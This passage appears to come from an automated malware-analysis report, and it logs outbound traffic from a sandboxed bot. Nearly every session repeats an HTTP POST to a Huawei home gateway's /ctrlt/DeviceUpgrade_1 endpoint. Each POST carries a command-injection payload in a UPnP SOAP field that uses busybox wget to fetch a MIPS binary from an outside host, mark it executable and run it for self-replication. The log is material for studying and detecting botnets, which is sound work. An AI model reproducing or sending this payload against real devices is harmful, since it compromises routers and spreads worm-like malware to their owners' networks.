2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          696192.168.2.1552938197.41.230.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639614105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          697192.168.2.1558468197.14.142.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639816046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          698192.168.2.154673041.205.138.19337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639828920 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          699192.168.2.1557130197.180.66.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639853001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          700192.168.2.1540928102.50.122.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639864922 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          701192.168.2.1550160157.137.203.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639913082 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          702192.168.2.155568841.27.134.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639925957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          703192.168.2.154156441.194.102.25237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.639942884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          704192.168.2.153810896.144.125.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.640163898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          705192.168.2.1539042197.16.63.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.640196085 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          706192.168.2.1544526157.68.218.2637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:52.643806934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
